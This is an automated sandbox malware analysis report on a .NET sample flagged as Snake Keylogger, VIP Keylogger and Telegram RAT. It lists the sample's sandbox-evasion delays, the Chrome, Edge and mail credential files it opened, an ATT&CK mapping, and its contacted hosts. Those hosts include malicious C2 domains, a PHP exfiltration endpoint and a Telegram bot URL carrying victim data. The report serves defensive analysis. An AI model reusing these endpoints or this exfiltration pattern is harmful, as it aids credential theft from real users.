Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596217	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594993	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe	Window / User API: threadDelayed 8582			Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Window / User API: threadDelayed 1284			Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368	Thread sleep count: 8582 > 30	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368	Thread sleep count: 1284 > 30	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -599636s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -599421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597996s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597888s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597637s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597417s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -594993s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -594671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364	Thread sleep time: -594562s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599636	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597996	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597888	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597741	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597637	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597417	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596217	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594993	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCult

Source: C:\Users\user\Desktop\z64BLPL.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe

Code function: 0_2_066996C8 LdrInitializeThunk,

0_2_066996C8

Source: C:\Users\user\Desktop\z64BLPL.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe	Queries volume information: C:\Users\user\Desktop\z64BLPL.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: z64BLPL.exe, type: SAMPLE
Source: Yara match	File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: z64BLPL.exe, type: SAMPLE
Source: Yara match	File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\z64BLPL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\z64BLPL.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: z64BLPL.exe, type: SAMPLE
Source: Yara match	File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: z64BLPL.exe, type: SAMPLE
Source: Yara match	File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: z64BLPL.exe, type: SAMPLE
Source: Yara match	File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
z64BLPL.exe	74%	ReversingLabs	ByteCode-MSIL.Spyware.Snakekeylogger
z64BLPL.exe	100%	Avira	HEUR/AGEN.1307591
z64BLPL.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	Avira URL Cloud	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	Avira URL Cloud	safe
http://mail.electradubai.com	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mail.electradubai.com	192.250.231.25	true	true	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	z64BLPL.exe	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	z64BLPL.exe, 00000000.00000002.4120925537.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	z64BLPL.exe	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	z64BLPL.exe	true	URL Reputation: malware	unknown
http://51.38.247.67:8081/_send_.php?L	z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
